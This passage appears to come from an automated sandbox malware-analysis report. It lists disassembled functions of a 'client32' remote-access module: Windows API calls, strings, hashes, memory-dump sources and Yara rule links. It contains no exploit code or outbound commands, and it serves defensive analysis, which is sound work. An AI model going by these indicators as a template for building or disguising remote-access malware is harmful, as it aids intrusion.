                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                                  • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                                  • API String ID: 2776021309-3012761530
                                                                                  • Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                  • Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
                                                                                  • Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                  • Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5
                                                                                  Function 1101D660 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 1101D66E
                                                                                  • LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
                                                                                  • RegisterClassExA.USER32(00000030), ref: 1101D6F1
                                                                                  • GetLastError.KERNEL32 ref: 1101D6F7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 430917334-4108050209
                                                                                  • Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                  • Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
                                                                                  • Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                  • Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99
                                                                                  Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                                  • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                  • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                  • API String ID: 468487828-934300333
                                                                                  • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                  • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                                  • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                  • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                  Function 11003480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadMenuA.USER32(00000000,00002EF1), ref: 1100348D
                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 110034B3
                                                                                  • DestroyMenu.USER32(00000000), ref: 110034E2
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                  • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                  • API String ID: 468487828-934300333
                                                                                  • Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                  • Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
                                                                                  • Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                  • Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9
                                                                                  Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                                  • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                                  • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                                  • CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 2375713580-0
                                                                                  • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                  • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                                  • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                  • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                                  Function 1113D790 Relevance: 9.0, APIs: 6, Instructions: 49synchronizationthreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11040BBA,00000000), ref: 1113D7C5
                                                                                  • CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
                                                                                  • SetEvent.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D805
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,11040BBA,00000000), ref: 1113D816
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D829
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D83C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateEventHandle$ObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 414154005-0
                                                                                  • Opcode ID: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                  • Instruction ID: 02350ad9304c652d5973a468123ac0969e3fb67a745117c4f7e49a1723ee0a3b
                                                                                  • Opcode Fuzzy Hash: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                  • Instruction Fuzzy Hash: 9F11CE705C8265AAF7298BE5C9A8B95FFA4934631DF50402AF2389658CCBB02088CB54
                                                                                  Function 111715A2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 111715AE
                                                                                    • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                    • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                  • __amsg_exit.LIBCMT ref: 111715CE
                                                                                  • __lock.LIBCMT ref: 111715DE
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 111715FB
                                                                                  • _free.LIBCMT ref: 1117160E
                                                                                  • InterlockedIncrement.KERNEL32(02641708), ref: 11171626
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                  • String ID:
                                                                                  • API String ID: 3470314060-0
                                                                                  • Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                  • Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
                                                                                  • Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                  • Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6
                                                                                  Function 110B3560 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
                                                                                  • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
                                                                                  • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$EventObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 2857295742-0
                                                                                  • Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                  • Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
                                                                                  • Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                  • Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60
                                                                                  Function 1103B606 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F
                                                                                    • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                    • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                    • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                    • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                  • GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
                                                                                  • String ID: Survey$pcicl32.dll$toastImageAndText.png
                                                                                  • API String ID: 2477883239-2305317391
                                                                                  • Opcode ID: 36c5674273f243e941f224807b5ad49c9c103fe6826938d503f0889e95c6792e
                                                                                  • Instruction ID: a37ee32854b15c041e991ad0c80392c526a8d8f631297bf945f8db0117e793ba
                                                                                  • Opcode Fuzzy Hash: 36c5674273f243e941f224807b5ad49c9c103fe6826938d503f0889e95c6792e
                                                                                  • Instruction Fuzzy Hash: 3871E27590465A9FE709CF64C8D8FEAB7F5EB48308F1485A9D5198B381EB30E944CB50
                                                                                  Function 110773B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
                                                                                    • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                                  • EqualRect.USER32(?,?), ref: 1107740C
                                                                                  • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                                  • m_hWnd, xrefs: 11077447
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
